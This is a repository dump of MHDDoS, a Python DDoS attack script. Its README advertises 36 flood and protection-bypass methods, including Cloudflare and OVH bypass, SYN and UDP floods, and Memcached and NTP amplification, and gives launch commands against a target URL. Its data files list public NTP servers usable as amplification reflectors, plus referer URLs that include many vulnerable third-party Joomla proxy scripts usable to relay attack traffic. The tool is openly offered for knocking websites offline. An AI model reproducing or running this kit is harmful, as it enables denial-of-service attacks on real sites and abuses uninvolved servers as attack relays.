├── README.md ├── files ├── README.md ├── memcached_servers.txt ├── ntp_servers.txt ├── proxys │ └── socks5.txt ├── referers.txt └── useragent.txt ├── requirements.txt ├── screenshot ├── README.md └── logo.ico └── start.py /README.md: -------------------------------------------------------------------------------- 1 |

aventium softworks

2 | 3 |

MHDDoS - DDoS Attack Script With 36 Method

4 | 5 |
(Code Lang - Python 3)
6 | 7 | 8 |

Please Don't Hit '.gov' and '.ir' Websites :)

9 | 10 |

POWER

11 |

SCRIPT

12 | 13 | ## Features And Method 14 | 15 | * 💣 Layer7 16 | * get GET | GET Flood 17 | * post POST | POST Flood 18 | * ovh OVH | Bypass OVH 19 | * stress STRESS | Send HTTP Packet With High Byte 20 | * ostress OSTRESS | STRESS Without Proxy 21 | * dyn DYN | A New Method With Random SubDomain 22 | * slow SLOW | Slowloris Old Method of DDoS 23 | * head HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD 24 | * hit HIT | POST Without PROXY 25 | * null NULL | Null UserAgent and ... 26 | * cookie COOKIE | Random Cookie PHP 'if (isset($_COOKIE))' 27 | * brust BRUST | A Method with more header 28 | * pps PPS | Only 'GET / HTTP/1.1\r\n\r\n' 29 | * even EVEN | GET Method with more header 30 | * googleshield GSB | Google Project Shield Bypass 31 | * DDoSGuard DGB | DDoS Guard Bypass 32 | * ArvanCloud AVB | Arvan Cloud Bypass 33 | * CloudFlare CFB | CloudFlare Bypass 34 | * bypass BYPASS | Bypass Normal AntiDDoS 35 | 36 | 37 | * 🧨 Layer4: 38 | * tcp TCP | TCP Flood Bypass 39 | * udp UDP | UDP Flood Bypass 40 | * syn SYN | SYN Flood 41 | * vse VSE | VSE Flood Only Connection 42 | * mem MEM | Memcached Flood 43 | * ntp NTP | NTP Flood OLD Method Of Layer4 44 | 45 | * 🏹 Layer3 46 | * icmp ICMP | Flood ICMP Request 47 | * ⚔️ POD | Ping Of Death OLD Method Of DDoS 48 | 49 | * ⚙️ Tools - Run With 'python3 start.py tools' 50 | * 🌟 CFIP | Find Real IP address of Website Powered by Cloudflare 51 | * 🔪 DNS | Show Site DNS Records 52 | * ⚠️ PING | PING server 53 | * 📌 CHECK | Check Website Die or no 54 | * 😎 DSTAT | a Method show Receive And Send Bytes Size 55 | 56 | * 🎩 Other 57 | * ❌ STOP | STOP All Attacks 58 | * 🌠 TOOLS | Tools Console 59 | * 👑 HELP | Show Usge Script 60 | 61 | * Layer4 DDoS Script 62 | #### Issues ? 63 | * Telegram : @MH_ProDev_IR 64 | * Discord : MH_ProDev#5642 65 | * [GitHub][github] 66 | #### Like the project? Leave a ⭐ star on the repository! 67 | 68 | ## Downloads 69 | 70 | You can download from [GitHub Releases](https://github.com/MHProDev/MHDDoS/releases) 71 | 72 | ### Getting Started 73 | 74 | **Requirements** 75 | 76 | * [Python3][python3] 77 | * requests 78 | * PySocks 79 | * cfscrape 80 | * icmplib 81 | * scapy 82 | --- 83 | 84 | **Video's** 85 | 86 | * Aparat: https://www.aparat.com/v/bHcP9 87 | * YouTube : Comming soon.. 88 | 89 | **toturial** 90 | 91 | * Aprat : Comming soon.. 92 | * YouTube : Comming soon.. 93 | 94 | --- 95 | 96 | **Clone and Install Script** 97 | 98 | ```console 99 | > git clone https://github.com/MHProDev/MHDDoS.git 100 | > cd MHDDoS 101 | > pip3 install -r requirements.txt 102 | ``` 103 | 104 | --- 105 | 106 | **Launch Script** 107 | 108 | ```console 109 | > python3 start.py 110 | > python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100 111 | ``` 112 | 113 | [python3]: https://python.org 'Python3' 114 | [github]: https://github.com/MHProDev/MHDDoS/issues 'GitHub' 115 | 116 | **💰 Donate (BTC):** ```bc1qpn7hz32x3pcapeajth420cahuz6nkrp5c57gz8``` 117 | -------------------------------------------------------------------------------- /files/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /files/ntp_servers.txt: -------------------------------------------------------------------------------- 1 | time.google.com 2 | time1.google.com 3 | time2.google.com 4 | time3.google.com 5 | time4.google.com 6 | time.cloudflare.com 7 | time.windows.com 8 | time.apple.com 9 | time.euro.apple.com 10 | clepsydra.dec.com/clepsydra.labs.hp.com/clepsydra.hpl.hp.com 11 | time-a-g.nist.gov 12 | time-b-g.nist.gov 13 | time-c-g.nist.gov 14 | time-d-g.nist.gov 15 | time-a-wwv.nist.gov 16 | time-b-wwv.nist.gov 17 | time-c-wwv.nist.gov 18 | time-d-wwv.nist.gov 19 | time-a-b.nist.gov 20 | time-b-b.nist.gov 21 | time-c-b.nist.gov 22 | time-d-b.nist.gov 23 | time.nist.gov 24 | utcnist.colorado.edu 25 | utcnist2.colorado.edu 26 | ntp1.vniiftri.ru 27 | ntp2.vniiftri.ru 28 | ntp3.vniiftri.ru 29 | ntp4.vniiftri.ru 30 | ntp1.niiftri.irkutsk.ru 31 | ntp2.niiftri.irkutsk.ru 32 | vniiftri.khv.ru 33 | vniiftri2.khv.ru 34 | ntp21.vniiftri.ru 35 | ntp.mobatime.ru 36 | ntp1.stratum1.ru 37 | ntp2.stratum1.ru 38 | ntp3.stratum1.ru 39 | ntp4.stratum1.ru 40 | ntp5.stratum1.ru 41 | ntp2.stratum2.ru 42 | ntp3.stratum2.ru 43 | ntp4.stratum2.ru 44 | ntp5.stratum2.ru 45 | stratum1.net 46 | ntp.ru 47 | ts1.aco.net 48 | ts2.aco.net 49 | ntp1.net.berkeley.edu 50 | ntp2.net.berkeley.edu 51 | ntp.gsu.edu 52 | tick.usask.ca 53 | tock.usask.ca 54 | ntp.nsu.ru 55 | ntp.rsu.edu.ru 56 | ntp.nict.jp 57 | clock.nyc.he.net 58 | clock.sjc.he.net 59 | ntp.fiord.ru 60 | gbg1.ntp.se 61 | gbg2.ntp.se 62 | mmo1.ntp.se 63 | mmo2.ntp.se 64 | sth1.ntp.se 65 | sth2.ntp.se 66 | svl1.ntp.se 67 | svl2.ntp.se 68 | ntp.se 69 | ntp.yycix.ca 70 | ntp.ix.ru 71 | time-a.as43289.net 72 | time-b.as43289.net 73 | time-c.as43289.net 74 | ntp.ripe.net 75 | clock.isc.org (prev ntp.isc.org) 76 | ntp.time.nl (ntp1.time.nl) 77 | ntp0.as34288.net 78 | ntp1.as34288.net 79 | ntp1.jst.mfeed.ad.jp 80 | ntp2.jst.mfeed.ad.jp 81 | ntp3.jst.mfeed.ad.jp 82 | pool.ntp.org 83 | 0.pool.ntp.org 84 | 1.pool.ntp.org 85 | 2.pool.ntp.org 86 | 3.pool.ntp.org 87 | europe.pool.ntp.org 88 | 0.europe.pool.ntp.org 89 | 1.europe.pool.ntp.org 90 | 2.europe.pool.ntp.org 91 | 3.europe.pool.ntp.org 92 | asia.pool.ntp.org 93 | 0.asia.pool.ntp.org 94 | 1.asia.pool.ntp.org 95 | 2.asia.pool.ntp.org 96 | 3.asia.pool.ntp.org 97 | ru.pool.ntp.org 98 | 0.ru.pool.ntp.org 99 | 1.ru.pool.ntp.org 100 | 2.ru.pool.ntp.org 101 | 3.ru.pool.ntp.org 102 | 0.gentoo.pool.ntp.org 103 | 1.gentoo.pool.ntp.org 104 | 2.gentoo.pool.ntp.org 105 | 3.gentoo.pool.ntp.org 106 | 0.arch.pool.ntp.org 107 | 1.arch.pool.ntp.org 108 | 2.arch.pool.ntp.org 109 | 3.arch.pool.ntp.org 110 | 0.fedora.pool.ntp.org 111 | 1.fedora.pool.ntp.org 112 | 2.fedora.pool.ntp.org 113 | 3.fedora.pool.ntp.org 114 | 0.opensuse.pool.ntp.org 115 | 1.opensuse.pool.ntp.org 116 | 2.opensuse.pool.ntp.org 117 | 3.opensuse.pool.ntp.org 118 | 0.centos.pool.ntp.org 119 | 1.centos.pool.ntp.org 120 | 2.centos.pool.ntp.org 121 | 3.centos.pool.ntp.org 122 | 0.debian.pool.ntp.org 123 | 1.debian.pool.ntp.org 124 | 2.debian.pool.ntp.org 125 | 3.debian.pool.ntp.org 126 | 0.askozia.pool.ntp.org 127 | 1.askozia.pool.ntp.org 128 | 2.askozia.pool.ntp.org 129 | 3.askozia.pool.ntp.org 130 | 0.freebsd.pool.ntp.org 131 | 1.freebsd.pool.ntp.org 132 | 2.freebsd.pool.ntp.org 133 | 3.freebsd.pool.ntp.org 134 | 0.netbsd.pool.ntp.org 135 | 1.netbsd.pool.ntp.org 136 | 2.netbsd.pool.ntp.org 137 | 3.netbsd.pool.ntp.org 138 | 0.openbsd.pool.ntp.org 139 | 1.openbsd.pool.ntp.org 140 | 2.openbsd.pool.ntp.org 141 | 3.openbsd.pool.ntp.org 142 | 0.dragonfly.pool.ntp.org 143 | 1.dragonfly.pool.ntp.org 144 | 2.dragonfly.pool.ntp.org 145 | 3.dragonfly.pool.ntp.org 146 | 0.pfsense.pool.ntp.org 147 | 1.pfsense.pool.ntp.org 148 | 2.pfsense.pool.ntp.org 149 | 3.pfsense.pool.ntp.org 150 | 0.opnsense.pool.ntp.org 151 | 1.opnsense.pool.ntp.org 152 | 2.opnsense.pool.ntp.org 153 | 3.opnsense.pool.ntp.org 154 | 0.amazon.pool.ntp.org 155 | 1.amazon.pool.ntp.org 156 | 2.amazon.pool.ntp.org 157 | 3.amazon.pool.ntp.org 158 | tick.usno.navy.mil 159 | tock.usno.navy.mil 160 | ntp2.usno.navy.mil 161 | utcnist2.colorado.edu 162 | timekeeper.isi.edu 163 | rackety.udel.edu 164 | mizbeaver.udel.edu 165 | otc1.psu.edu 166 | gnomon.cc.columbia.edu 167 | navobs1.gatech.edu 168 | navobs1.wustl.edu 169 | now.okstate.edu 170 | ntp.colby.edu 171 | ntp-s1.cise.ufl.edu 172 | ntpstm.netbone-digital.com 173 | nist1.symmetricom.com 174 | t2.timegps.net 175 | gps.layer42.net 176 | ntp-ca.stygium.net 177 | sesku.planeacion.net 178 | ntp0.nl.uu.net 179 | ntp1.nl.uu.net 180 | navobs1.oar.net 181 | ntp-galway.hea.net 182 | ntp1.ona.org 183 | time.fu-berlin.de 184 | atom.uhr.de 185 | ntps1-0.cs.tu-berlin.de 186 | ntps1-1.cs.tu-berlin.de 187 | ntps1-0.uni-erlangen.de 188 | ntps1-1.uni-erlangen.de 189 | ntp1.fau.de 190 | ntp2.fau.de 191 | ntp.dianacht.de 192 | zeit.fu-berlin.de 193 | ptbtime1.ptb.de 194 | ptbtime2.ptb.de 195 | rustime01.rus.uni-stuttgart.de 196 | rustime02.rus.uni-stuttgart.de 197 | chime1.surfnet.nl 198 | ntp.vsl.nl 199 | asynchronos.iiss.at 200 | ntp.nic.cz 201 | time.ufe.cz 202 | ntp.fizyka.umk.pl 203 | ntp1.usv.ro 204 | ntp3.usv.ro 205 | timehost.lysator.liu.se 206 | time1.stupi.se 207 | time.nrc.ca 208 | clock.uregina.ca 209 | cronos.cenam.mx 210 | ntp.lcf.mx 211 | hora.roa.es 212 | minuto.roa.es 213 | ntp1.inrim.it 214 | ntp2.inrim.it 215 | ntp1.oma.be 216 | ntp2.oma.be 217 | ntp.atomki.mta.hu 218 | ntp.i2t.ehu.eus 219 | ntp.neel.ch 220 | ntp.neu.edu.cn 221 | ntp.nict.jp 222 | ntps1.pads.ufrj.br 223 | ntp.shoa.cl 224 | time.esa.int 225 | time1.esa.int 226 | http://support.ntp.org/bin/view/Servers/StratumOneTimeServers 227 | http://support.ntp.org/bin/view/Servers/StratumTwoTimeServers 228 | http://support.ntp.org/bin/view/Servers/NTPPoolServers 229 | http://www.pool.ntp.org/zone/@ 230 | http://www.pool.ntp.org/zone/asia 231 | http://www.pool.ntp.org/zone/europe 232 | http://www.pool.ntp.org/zone/north-america 233 | http://www.pool.ntp.org/zone/oceania 234 | http://www.pool.ntp.org/zone/south-america 235 | https://time.nl/ 236 | https://time.nl/index_en.html 237 | -------------------------------------------------------------------------------- /files/proxys/socks5.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /files/referers.txt: -------------------------------------------------------------------------------- 1 | https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u= 2 | https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u= 3 | https://drive.google.com/viewerng/viewer?url= 4 | http://www.google.com/translate?u= 5 | https://developers.google.com/speed/pagespeed/insights/?url= 6 | http://help.baidu.com/searchResult?keywords= 7 | http://www.bing.com/search?q= 8 | https://add.my.yahoo.com/rss?url= 9 | https://play.google.com/store/search?q= 10 | http://www.google.com/?q= 11 | http://regex.info/exif.cgi?url= 12 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 13 | http://www.google.com/translate?u= 14 | http://translate.google.com/translate?u= 15 | http://validator.w3.org/feed/check.cgi?url= 16 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 17 | http://validator.w3.org/check?uri= 18 | http://jigsaw.w3.org/css-validator/validator?uri= 19 | http://validator.w3.org/checklink?uri= 20 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 21 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 22 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 23 | http://validator.w3.org/mobile/check?docAddr= 24 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 25 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 26 | http://feedvalidator.org/check.cgi?url= 27 | http://gmodules.com/ig/creator?url= 28 | http://www.google.com/ig/adde?moduleurl= 29 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 30 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 31 | http://host-tracker.com/check_page/?furl= 32 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 33 | http://www.onlinewebcheck.com/check.php?url= 34 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 35 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 36 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 37 | http://browsershots.org;POST;browsershots.org.txt 38 | http://streamitwebseries.twww.tv/proxy.php?url= 39 | http://www.comicgeekspeak.com/proxy.php?url= 40 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 41 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 42 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 43 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 44 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 45 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 46 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 47 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 48 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 49 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 50 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 51 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 52 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 53 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 54 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 55 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 56 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 57 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 58 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 59 | http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 60 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 61 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 62 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 63 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 64 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 65 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 66 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 67 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 68 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 69 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 70 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 71 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 72 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 73 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 74 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 75 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 76 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 77 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 78 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 79 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 80 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 81 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 82 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 83 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 84 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 85 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 86 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 87 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 88 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 89 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 90 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 91 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 92 | http://web-sniffer.net/?url= 93 | http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 94 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 95 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 96 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 97 | http://translate.yandex.net/tr-url/ru-uk.uk/ 98 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 99 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 100 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 101 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 102 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 103 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 104 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 105 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 106 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 107 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 108 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 109 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 110 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 111 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 112 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 113 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 114 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 115 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 116 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 117 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 118 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 119 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 120 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 121 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 122 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 123 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 124 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 125 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 126 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 127 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 128 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 129 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 130 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 131 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 132 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 133 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 134 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 135 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS 136 | http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 137 | http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 138 | http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 139 | http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 140 | http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 141 | http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url= 142 | http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url= 143 | http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url= 144 | http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 145 | http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url= 146 | http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url= 147 | http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url= 148 | http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 149 | http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 150 | http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 151 | http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 152 | http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 153 | http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url= 154 | http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 155 | http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url= 156 | http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url= 157 | http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 158 | http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url= 159 | http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 160 | http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url= 161 | http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url= 162 | http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url= 163 | http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url= 164 | http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 165 | http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 166 | http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 167 | http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url= 168 | http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 169 | http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 170 | http://validator.w3.org/nu/?doc= 171 | http://check-host.net/check-http?host= 172 | http://www.netvibes.com/subscribe.php?url= 173 | http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url= 174 | http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 175 | http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url= 176 | http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 177 | http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url= 178 | http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 179 | http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url= 180 | http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url= 181 | http://www.google.com/ig/add?feedurl= 182 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 183 | http://www.google.com/translate?u= 184 | http://translate.google.com/translate?u= 185 | http://validator.w3.org/feed/check.cgi?url= 186 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 187 | http://validator.w3.org/check?uri= 188 | http://jigsaw.w3.org/css-validator/validator?uri= 189 | http://validator.w3.org/checklink?uri= 190 | http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 191 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 192 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 193 | http://www.w3.org/services/tidy?docAddr= 194 | http://validator.w3.org/mobile/check?docAddr= 195 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 196 | http://validator.w3.org/p3p/20020128/policy.pl?uri= 197 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 198 | http://feedvalidator.org/check.cgi?url= 199 | http://gmodules.com/ig/creator?url= 200 | http://www.google.com/ig/adde?moduleurl= 201 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 202 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 203 | http://host-tracker.com/check_page/?furl= 204 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 205 | http://www.viewdns.info/ismysitedown/?domain= 206 | http://www.onlinewebcheck.com/check.php?url= 207 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 208 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 209 | http://streamitwebseries.twww.tv/proxy.php?url= 210 | http://www.comicgeekspeak.com/proxy.php?url= 211 | https://www.google.com/search?q= 212 | https://check-host.net/ 213 | https://www.facebook.com/ 214 | https://www.youtube.com/ 215 | https://www.fbi.com/ 216 | https://www.bing.com/search?q= 217 | https://r.search.yahoo.com/ 218 | https://www.cia.gov/index.html 219 | http://netsec-reborn.onion/QuickStresser-virus?id= 220 | https://vk.com/profile.php?redirect= 221 | https://www.usatoday.com/search/results?q= 222 | https://help.baidu.com/searchResult?keywords= 223 | https://steamcommunity.com/market/search?q= 224 | https://www.ted.com/search?q= 225 | https://play.google.com/store/search?q= 226 | https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u= 227 | https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u= 228 | https://drive.google.com/viewerng/viewer?url= 229 | http://www.google.com/translate?u= 230 | https://developers.google.com/speed/pagespeed/insights/?url= 231 | http://help.baidu.com/searchResult?keywords= 232 | http://www.bing.com/search?q= 233 | https://add.my.yahoo.com/rss?url= 234 | https://play.google.com/store/search?q= 235 | http://www.google.com/?q= 236 | http://regex.info/exif.cgi?url= 237 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 238 | http://www.google.com/translate?u= 239 | http://translate.google.com/translate?u= 240 | http://validator.w3.org/feed/check.cgi?url= 241 | 